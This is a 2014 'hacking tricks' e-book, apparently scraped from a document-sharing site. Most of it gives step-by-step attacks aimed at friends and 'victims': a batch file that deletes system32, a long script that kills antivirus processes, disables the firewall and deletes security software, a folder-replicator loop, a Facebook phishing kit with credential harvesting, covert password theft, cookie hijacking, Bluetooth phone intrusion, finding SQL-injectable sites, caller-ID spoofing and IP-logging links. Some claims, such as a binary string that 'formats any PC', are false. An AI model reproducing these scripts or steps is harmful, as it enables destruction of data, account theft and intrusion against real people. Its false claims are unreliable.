Download as pdf or txt
Download as pdf or txt
You are on page 1of 33

Table of Contents

Copy rights
Preface
How to Compile C Programs?
Testing the Working of y our Antivirus.
Hidden Codes for Android.
Hacking Windows Experience Index.
Attack Your Friend’s PC with a Small Virus.
Hacking Facebook by Phishing.
How to Fake y our Caller ID?
A Virus to format Hard Disk!
How to Create Folder Replicator Virus using Notepad?
A Virus that Kills y our Antivirus.
Hacking y our Friend's Password.
Hack Passwords by Hijacking HTTP Cookie.
Hack y our Friend's Phone through Bluetooth.
Hacking Websites through SQL Injection.
Tweaks for y our Windows PC.
How to Find the IP Address of Any one?
How to Trace the IP Address?
Hacking Windows Administrator Password.
Hacking Facebook and Websites–
Be Safe
By Techdroids

Published in 2014 - Digital Edition


Copyright © 2014 Ageless Reads

All rights reserved worldwide.


No part of this book can be used or copied without permission.
Preface

Hacking is not a crime, it is a talent.


KNOW HACKING BUT NO HACKING!

Few y ears back, I started a Facebook Page called Techdroids, showing some hacks
and tricks. It wasn't a long time, since I started getting numerous requests, say ing
that their beloved ones or friends hacked into their accounts and they wanted a
revenge to be taken by hacking theirs.

Me being a hacker, I learned hacking by testing it on my self.


I haven't hacked any ones accounts or websites, not because I can't.
It is a personal principle I follow, so I couldn't reply or respond to any requests I
got.

But now I took some time to write about this and get y ou a glimpse on how easy it
is to hack, thereby advising every one to increase their SECURITY MEASURES
and to BE SAFE!
In this book y ou will find SEVENTEEN HACKS that will turn y ou to a PRO. All the
hacks y ou will find in this book are for EDUCATIONAL PURPOSES only.

At the time of publishing this book, all the hacks were tested successfully
(Experimented on my self).
Misuse of this book is STRICTLY FORBIDDEN.
Neither Techdroids nor Ageless Reads will be responsible for the misuse.
How to Compile C Programs?

Before moving further, kindly go through this article. Later y ou will find few
articles which are based on this application.
1. Download Borland *++ compiler 5.5 (for Windows) from the given link.
http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1

2. After y ou download, run the file C++5.51.exe. The default installation path
would be:
C:\Borland\BCC55

How to configure Borland C++ compiler?

1. After the installation of Borland C++ compiler is complete, create two new Text
Documents.

2. Open the first New Text Document.txt file and copy the following lines:
-I”c:\Borland\Bcc55\include”
-L”c:\Borland\Bcc55\lib”
Save changes and close the file.
Now rename the file from New Text Document.txt to bcc32.cfg

3. Open the second New Text Document (2).txt file and copy the following line:
-L”c:\Borland\Bcc55\lib”
Save changes and close the file.
Rename the file from New Text Document (2).txt to ilink32.cfg

4. Now copy the two files bcc32.cfg and ilink32.cfg, navigate to


C:\Borland\BCC55\Bin and paste them.

How to Compile the C Source Code (.C files)?

1. You need to place the .C (example.c) file to be compiled in the following


location:
C:\Borland\BCC55\Bin
2. Now go to command prompt (Start->Run->ty pe cmd->Enter)
Use the command:
C:\Borland\BCC55\Bin

3. To compile the file (example.c), use the command:


bcc32 example.c

4. If there are no errors in the source code, y ou’ll get a compiled executable
module (example.exe) in the same location (C:\Borland\BCC55\Bin).
Finally, y ou have successfully compiled the source code into an executable file
(.exe file).
Testing the Working of your Antivirus.

1. Open notepad, copy this code:

X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-
FILE!$H+H*

Your antivirus is top notch, if it doesn't allow y our PC to copy the above mentioned
code.

2. If it does, save the file with extension .txt

Your antivirus is quite good, if it detects this file as a harmful substance.

3. If it is unable to detect, save the file with extension .exe

Your antivirus should be able to detect this!

If not, then y ou must change y our Antivirus immediately.


Hidden Codes for Android.

*#06# - IMEI no.


*#0*# - Service Menu.
*#0228# - Battery Status.
*#*#4636#*#* - Battery and Usage statistics.
*#*#34971539#*#* - Camera Information.
*#12580*369# - Software and Hardware information.
*#228# - ADC Reading.
#7353# - Hide test menu.
*#*#273283*255*663282*#*#* - Backup all y our media files.
*#*#232338#*#* - Wi-Fi mac address.
*#*#3264#*#* - RAM Information.
*#*#44336#*#* - Build time.
*#*#232337#*# - Bluetooth address.
*#*#197328640#*#* - Test Mode.
*#*#8351#*#* - Dial Mode.
*#*#8350#*#* - Disable Voice Dial Mode.
*#*#0842#*#* - Testing Backlight or vibration.
*#*#2664#*#* - Testing touch screen.
*#*#0289#*#* - Testing Audio
*#*#0*#*#* - Testing Display.
*#*#232331#*#* - Test Bluetooth.
*#*#1472365#*#* - Test GPS.
*#*#0588#*#* - Test Proximity Sensor.
*#*#7262626#*#* - Test Field.
*#*#232339#*#* - Test WLAN.
*#9090# - Device Configuration.
*#872564# - USB Logging.
*#9900# - Sy stem Dump Mode.
*#*#7780#*#* - Reset.
*2767*3855# - Format.
*#*#1234#*#* - PDA and Firmware version.
*#*#1111#*#* - FTA Software version.
*#*#2222#*#* - FTA Hardware version.
*#*#8255#*#* - Google Talk service monitor.
Hacking Windows Ex perience Index .

1. Follow the below mentioned path:


C: >>Windows > Performance >WinSAT > DataStore.

2. In the DataStore folder y ou can see a lot of XML files, find the latest file.

3. Just copy that file onto the desktop and open it with notepad and search for
Sy stem Score (CTRL+F), here y ou can check the score of y our PC.

4. Change it to any number and save it.

5. Copy back this file to its original directory, to the folder DataStore.

6. On checking sy stem's properties, y ou can find the new value of y our sy stem.
Attack Your Friend’s PC with a Small Virus.

1. Open Notepad.

2. Copy the given command: -del c:\WINDOWS\sy stem32\**/q

3. Save the above notepad with the extension ".bat or.cmd".

4. Double clicking the file will delete all the files from y our friend's PC's sy stem32
folder, later y our friend's PC cannot be started again.
Hacking Facebook by Phishing.

1. Download the ACTION.PHP and HTML file from any one of the given link
http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1

2. Open the HTML File in Notepad


Press CTRL+F and search ‘ACTION’

It appears like this:


action=http://y oursite.com/action.php
Replace only http://y oursite.com with y our by ethost.com site.

3. Now go ahead and sign up at by tehost.com.

4. After signing up, go to File Manager.


5. Next, go to HT Docs, delete the existing files (ACTION.PHP and other HTML
files).

6. Now first upload y our Edited HTML Page (INDEX.HTML) and next the PHP
File.

7. Give y our by tehost.com website to y our friends and they will login thinking its
their Facebook Login Page, but we know this is a fake one.

8. When they click on login, they will be redirected to a Facebook page of ours.

9. You can change the page where y ou want them to be redirected.

Go to HT Docs and edit ACTIONS.PHP file, replace the given site with any site of
y our choice, this will be the site where the victim will be redirected.
10. When y our victim logins, ty pe y our by tehost.com site along with victims.html
and press ENTER.
Eg: HTTP://YOURSITE.BYETHOST.COM/VICTIMS.HTML
11. Here comes the magic..
How to Fake your Caller ID?

Download the software based on y our mobile operating sy stem from:

https://play.google.com/store/apps/details?id=com.telcentris.voxox
or
https://itunes.apple.com/us/app/voxox-call-for-call-connect/id387656058

Follow the below procedure:

1. In the call connect option, ty pe y our victim's number, the number y ou want to
call.

2. In the dialer, ty pe the number y ou want to fake, this is the number which
appears on y our victim's phone.

3. Press the call button.


A Virus to format Hard Disk!

1.Open notepad, copy the code given below.

01001011000111110010010101010101010000011111100000

2.Save the file with extension .exe

3.Double clicking the file will format any PC with no warning.


How to Create Folder Replicator Virus using Notepad?

Folder replicator virus keeps on multiply ing a file infinite times.

Steps for creating folder replicator:

1.Open notepad, copy the code given below.


cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop

2.Save the file with extension .bat

3.Run it on Victim's PC to see the replication.


A Virus that Kills your Antivirus.

Open notepad, copy the code given below and save the file with extension .bat

@ echo off
rem --
rem Permanently Kill Anti-Virus
net stop “Security Center”
netsh firewall set opmode mode=disable
tskill /A av*
tskill /A fire*
tskill /A anti*
cls
tskill /A spy *
tskill /A bullguard
tskill /A PersFw
tskill /A KAV*
tskill /A ZONEALARM
tskill /A SAFEWEB
cls
tskill /A OUTPOST
tskill /A nv*
tskill /A nav*
tskill /A F-*
tskill /A ESAFE
tskill /A cle
cls
tskill /A BLACKICE
tskill /A def*
tskill /A kav
tskill /A kav*
tskill /A avg*
tskill /A ash*
cls
tskill /A aswupdsv
tskill /A ewid*
tskill /A guard*
tskill /A guar*
tskill /A gcasDt*
tskill /A msmp*
cls
tskill /A mcafe*
tskill /A mghtml
tskill /A msiexec
tskill /A outpost
tskill /A isafe
tskill /A zap*
cls
tskill /A zauinst
tskill /A upd*
tskill /A zlclien*
tskill /A minilog
tskill /A cc*
tskill /A norton*
cls
tskill /A norton au*
tskill /A ccc*
tskill /A npfmn*
tskill /A loge*
tskill /A nisum*
tskill /A issvc
tskill /A tmp*
cls
tskill /A tmn*
tskill /A pcc*
tskill /A cpd*
tskill /A pop*
tskill /A pav*
tskill /A padmin
cls
tskill /A panda*
tskill /A avsch*
tskill /A sche*
tskill /A sy man*
tskill /A virus*
tskill /A realm*
cls
tskill /A sweep*
tskill /A scan*
tskill /A ad-*
tskill /A safe*
tskill /A avas*
tskill /A norm*
cls
tskill /A offg*
del /Q /F C:\Program Files\alwils~1\avast4\*.*
del /Q /F C:\Program Files\Lavasoft\Ad-awa~1\*.exe
del /Q /F C:\Program Files\kasper~1\*.exe
cls
del /Q /F C:\Program Files\trojan~1\*.exe
del /Q /F C:\Program Files\f-prot95\*.dll
del /Q /F C:\Program Files\tbav\*.dat
cls
del /Q /F C:\Program Files\avpersonal\*.vdf
del /Q /F C:\Program Files\Norton~1\*.cnt
del /Q /F C:\Program Files\Mcafee\*.*
cls
del /Q /F C:\Program Files\Norton~1\Norton~1\Norton~3\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\speedd~1\*.*
del /Q /F C:\Program Files\Norton~1\Norton~1\*.*
del /Q /F C:\Program Files\Norton~1\*.*
cls
del /Q /F C:\Program Files\avgamsr\*.exe
del /Q /F C:\Program Files\avgamsvr\*.exe
del /Q /F C:\Program Files\avgemc\*.exe
cls
del /Q /F C:\Program Files\avgcc\*.exe
del /Q /F C:\Program Files\avgupsvc\*.exe
del /Q /F C:\Program Files\grisoft
del /Q /F C:\Program Files\nood32krn\*.exe
del /Q /F C:\Program Files\nood32\*.exe
cls
del /Q /F C:\Program Files\nod32
del /Q /F C:\Program Files\nood32
del /Q /F C:\Program Files\kav\*.exe
del /Q /F C:\Program Files\kavmm\*.exe
del /Q /F C:\Program Files\kaspersky \*.*
cls
del /Q /F C:\Program Files\ewidoctrl\*.exe
del /Q /F C:\Program Files\guard\*.exe
del /Q /F C:\Program Files\ewido\*.exe
cls
del /Q /F C:\Program Files\pavprsrv\*.exe
del /Q /F C:\Program Files\pavprot\*.exe
del /Q /F C:\Program Files\avengine\*.exe
cls
del /Q /F C:\Program Files\apvxdwin\*.exe
del /Q /F C:\Program Files\webproxy \*.exe
del /Q /F C:\Program Files\panda software\*.*
rem --

On double pressing the saved file, the show starts.


Hacking your Friend's Password.

Here we will be using a software called GMAIL HACKER PRO, just run this
software on y our PC and make sure y our antivirus is disabled.
Since this a hacking software, an antivirus will show the message as ‘VIRUS
DETECTED’, but nothing to worry about.

1. Download the software from the link given below


http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1

Install this software into y our Pen Drive.

2. ACTIVATION KEYS - 02102102552 or 12312312312

3. Next, plug the Pen Drive to y our friend's PC and run the software directly off
y our Pen Drive in y our friend's absence.

4. Ty pe some fake email id and click on CRACK PASSWORD.

5. Using y our friend's browser cookies and cache data, the software collects all the
email ids and passwords that were used to log into his or her PC and display s them
on the screen.
Hack Passwords by Hijacking HTTP Cookie.

1. Download Firesheep Firefox add-on from any one of the links given below.
http://codebutler.github.com/firesheep/
Or
http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1

2. Install this add-on to y our Firefox (works perfectly on Windows XP and


Windows Vista).
Restart Firefox, connect to any public wireless network.

3. Now, in the sidebar, hit on "Start Capturing" and Firesheep searches for and
captures cookies in a wireless network.

4. As soon as any one on the wireless network visits any insecure website known to
Firesheep, their name and photo will be display ed in the sidebar.
Just double click on someone and y ou're into his or her account.
Hack your Friend's Phone through Bluetooth.

X2 Bluetooth Hack - http://goo.gl/cUXYHp or http://goo.gl/0WWjL1

Super Bluetooth Hack - http://goo.gl/cUXYHp or http://goo.gl/0WWjL1

Download any of the above software, copy them to y our device memory, install
them (Compatible with Phones running Java).

The following can be done:

Changing time or alarms.


Reading messages.
Reading contacts.
Changing profile.
Play ing ring tone even if the phone is on silent mode.
Play ing songs.
Restarting the phone.
Switching off the phone.
Restoring factory settings.
Changing ringing volume.
Hacking Websites through SQ L Injection.

SQL injection is a code injection technique, used to attack data-driven applications,


in which malicious SQL statements are inserted into an entry field for execution
(e.g. to dump the database contents to the attacker).

Download the software:


http://goo.gl/cUXYHp
Or
http://goo.gl/0WWjL1

Since this a hacking software, an antivirus will show the message as ‘VIRUS
DETECTED’, but nothing to worry about (Use 7-Zip to unzip these files).
Finding Sites Vulnerable to SQ L injection.

1. Goggle out inurl: php?id=


You will get a ton of results.

2. Open any page and add an apostrophe (‘) at the end of the url.

3. If y ou get a SQL sy ntax error, then this website can be vulnerable to SQL
injection.
Now y ou can try using Havij on this URL.
Tweaks for your Windows PC.

(Works in Windows XP, Vista and 7)

1. Disable USB Devices:

Open the Registry Editor (Start -> Run -> Ty pe regedit and hit Enter).

In the registry, navigate to the following key :


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\UsbStor

Double click on "START", present on the right side.

In the “Value data” field, enter 4 and click on “OK”.

Close the Registry Editor and reboot.

2. Add “Recycle Bin” to My Computer in Windows 7 and Vista:

Open the Registry Editor and navigate to the following key :


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\My C

Right-click on “NameSpace” and select New -> Key. Name the key with the
following name:
{645FF040-5081-101B-9F08-00AA002F954E}

Now, open “My Computer” and hit F5 to refresh the screen.

This should show up the “Recy cle Bin” icon.

3. Change the Registered Owner and Organization Name:

Open the Registry Editor and navigate to:


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion

On the right-side pane, find the key s RegisteredOwner and RegisteredOrganization.


Double-click on them to change the names to whatever y ou want.

To see the changes, right-click on “My Computer” and select “Properties”.


How to Find the IP Address of Anyone?

1. Go to whatistheirip.com website to find someone's IP Address.

2. Enter y our email id where y ou want to receive the victim's IP Address and hit
on "Get Link".

3. Now, y ou will get a link from IP Address Finder.

4. Send this link to y our victim through email or post the link in any forums or
websites and whenever any one clicks on this link, their IP Address will be recorded
and mailed to y ou.
How to Trace the IP Address?

After y ou found the IP address by following the method mentioned in the previous
article, now y ou can find the IP address information by following the below
mentioned method:

Go to http://www.ip2location.com/demo.aspx and enter the IP address that y ou


found in the dialog box and click on “Find Location”.

With just a click of a button y ou can find the following information of the IP
address.

1. The country in which the IP is located.


2. Region.
3. City.
4. Latitude and Longitude.
5. Zip Code.
6. Time Zone.
7. Name of the Internet Service Provider (ISP).
8. Internet Speed.
9. Weather Station.
10. Area Code.
11. The domain name associated with the IP address.
Hacking Windows Administrator Password.

1. Download this software:


Offline NT Password & Registry Editor - http://pogostick.net/~pnh/ntpasswd/

2. When y ou download the CD version, y ou’ll get a bootable image which needs to
be burnt onto a CD.

3. Use software like POWER ISO or NERO to burn the image onto y our CD.

3. Next boot y our computer from this CD and follow the on screen instructions to
reset the password.

You might also like